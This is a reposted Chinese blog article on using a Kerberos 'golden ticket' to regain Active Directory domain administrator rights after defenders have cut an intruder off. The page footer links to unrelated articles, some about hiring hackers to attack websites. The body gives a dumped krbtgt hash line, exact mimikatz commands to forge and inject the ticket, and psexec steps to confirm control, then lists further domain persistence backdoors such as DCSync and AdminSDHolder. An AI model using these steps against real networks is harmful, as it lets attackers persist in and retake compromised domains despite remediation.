渗透技术|域渗透的金之钥匙

hacker4年前黑客文章412

  最近几年很少搞内网渗透了,这几年发展的快啊,看了A牛翻译的 ,发现趋势都是powershell脚本化了。想当年遇到的域控都是windows 2003的,找朋友要些vbscript脚本自动化,然后那啥那啥的。现在搞域除了前段时间出的MS14068,还有龙哥翻译的,不知道还有什么新 *** ,心中还有 *** ,如果想交流的朋友,可以加我聊聊。

  我原来发过一个微博说

  

  这就是我说的金之钥匙【"golden ticket(s)"黄金票据】,利用这个的条件是你在原来搞定域控的时候,已经导出过域用户的HASH,尤其是krbtgt 这个用户的。但是在你在内网干其他事情的时候,活儿不细,被人家发现了,你拥有的域管理员权限掉了,你现在还有一个普通的域用户权限,管理员做加固的时候又忘记修改krbtgt密码了(很常见),我们还是能重新回来,步骤如下:

  要重新拿回域管理员权限,首先要先知道域内的管理员有谁

  我这里的实验环境,通过截图可以看到域管理员是administrator

  我还要知道域SID是啥

  我的域SID是

  还有最重要的krbtgt用户的ntlm哈希,我原来导出的是

  krbtgt(current-disabled):502:aad3b435b51404eeaad3b435b51404ee:6a8e501fabcf264c70 ef3316c6aab7dc:::

  

  然后该用神器mimikatz出场了,依次执行

  mimikatz # kerberos::purge

  mimikatz # kerberos::golden /admin:Administrator /domain:pentstlab.com /sid:S-1-5-21-3883552807-251258116-2724407435 /krbtgt:6a8e501fabcf264c70ef3316c6aab7dc /ticket:Administrator.kiribi

  mimikatz # kerberos::ptt Administrator.kiribi

  mimikatz # kerberos::tgt

  

  到现在,我们又重新拥有域管理员权限了,可以验证下

  E:\>net use \\WIN-0DKN2AS0T2G\c$

  E:\>psexec.exe \\WIN-0DKN2AS0T2G cmd

  

  呃,感觉这个 *** 比http://drops.wooyun.org/tips/9297这个方便些,文章写了好久了,一直凑不出更多的字数,就没发。。嗯。。。懒了。。

  当然除了golden ticket,silver ticket之外还有kerberos ticket,历史SID,AdminSDHolder,DSRM,GPP,DCSync等技术手段都可以用来当做域控的隐藏后门。

  【原文:域渗透的金之钥匙 作者:mickey 安全脉搏整理发布】

标签: 渗透测试

相关文章

日本花样滑冰黑客帝国(日本人气花样滑冰选手)

日本花样滑冰黑客帝国(日本人气花样滑冰选手)

本文目录一览: 1、除了羽生结弦,日本花滑还有哪些厉害的人物? 2、本田真凛的花滑技术怎么样?本田真凛都参加过什么比赛? 3、花滑goat是谁? 除了羽生结弦,日本花滑还有哪些厉害的人物?...

3个高档女装进货赚钱门路月入过万挣钱多

有些人说过女人与小孩的钱最好是赚,这句话放到现如今一样可用。针对许多创业人而言,她们主推的高档女装恰好是年青的都市白领为主导。可在运营全过程中,要想月入过万挣钱多?那麼免不了遇到许多一手货源难...

黑客帝国男主角为什么没死,找球球大作战黑客,黑客是怎么找网站漏洞

3.Webshell后门检测 windows/foreign/reverse_http比方一个标题是将flag藏在后台管理员暗码方位,那么你能够用0x02里说的法办法,这样防备搅屎棍:...

现代SEO的三个核心技巧你掌握了吗?

SEO一直是带来长期流量的有效方式。虽然这几年SEO不断演变,但目的仍然保持不变——即获取流量。 随着2016年进入尾声,那些老派的提高网站排名的方式已经没用。搜索引擎越来越重视那些创造了有效内容的...

哪里怎么找黑客帮忙-黑客网站找人是真的吗(怎么找黑客攻击网站)

哪里怎么找黑客帮忙-黑客网站找人是真的吗(怎么找黑客攻击网站)

哪里怎么找黑客帮忙相关问题 黑客网站找人犯法吗相关问题 如何快速让菜鸟成为黑客 kali linux入侵手机(kali linux入侵电...

网络黑客信息平台网:数据库网络安全审计在数据安全整治稽核中的作用

一. ?数据安全整治稽核 在数据安全整治全过程中,最先根据数据财产整理明确比较敏感数据的储存部位和应用状况,进而制订合理的数据安全管理方案和标准;进而根据合理的方式方法完成数据应用的个人行为监管;最...